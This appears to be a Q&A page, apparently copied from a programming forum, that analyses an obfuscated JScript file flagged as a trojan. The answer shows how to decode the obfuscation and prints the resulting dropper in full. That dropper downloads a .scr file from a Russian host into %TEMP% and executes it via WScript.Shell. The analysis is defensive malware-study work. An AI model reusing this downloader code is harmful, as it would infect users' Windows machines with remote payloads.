What does this bit of javascript do? This was marked by ESET as trojan

走远了吗. 提交于 2019-12-03 20:57:36

Interesting obfuscation, lots use of the comma operator. Notice that

function String.prototype.e(a) {
    return this.charAt(a);
}

is syntactically invalid JavaScript, but works in (possibly only old versions of) Jscript (see here, page 69). Those .e() calls just get the first character of the respective string.

Removing the obfuscation using the snippet

code.replace(/\\u([0-9a-f]{4})/g, function(_, c) { return String.fromCharCode(parseInt(c, 16)); })
  .replace(/\((?:'[^']*',\s*)*'(.)[^']*'\.e\(\)\)/g, "'$1'")
  .replace(/'\s*\+\s*'/g, "")

this is what you will get (do not run this!):

autonomousRadio = eval('this');
autonomousRadio = autonomousRadio['ActiveXObject'];
skeletonArcade = 'Run';
phaseMemorial = new autonomousRadio('WScript.Shell');
tribuneApparatus = phaseMemorial['ExpandEnvironmentStrings']('%TEMP%/') + "XFxuhJaJ" + '.scr';
classificationHospital = new autonomousRadio('MSXML2.XMLHTTP');
classificationHospital['open']('GET', 'http://mondero.ru/system/logs/56y4g45gh45h', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1)));
classificationHospital['send']();
while (classificationHospital['readystate'] < ((2 ^ 1) ^ (1 | 6))) {
    this['WScript']['Sleep'](((3384 / 36) + (5 + 1)));
}
commandOccupy = new autonomousRadio('ADODB.Stream');
try {
    commandOccupy['open']();
    commandOccupy['type'] = ((0 / 16) ^ (52 - 51));
    commandOccupy['write'](classificationHospital['ResponseBody']);
    commandOccupy['position'] = ((0 & 1) & (1 | 0));
    try {
        commandOccupy['saveToFile'](tribuneApparatus, ((2 ^ 0) | (0 + 0)));
        commandOccupy['close']();
        phaseMemorial[skeletonArcade](tribuneApparatus);
    } catch (arbiterApproximation) {};
} catch (arbiterApproximation) {};

Yes, this is clearly a trojan, downloading a .scr file from that russian domain onto your computer.

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!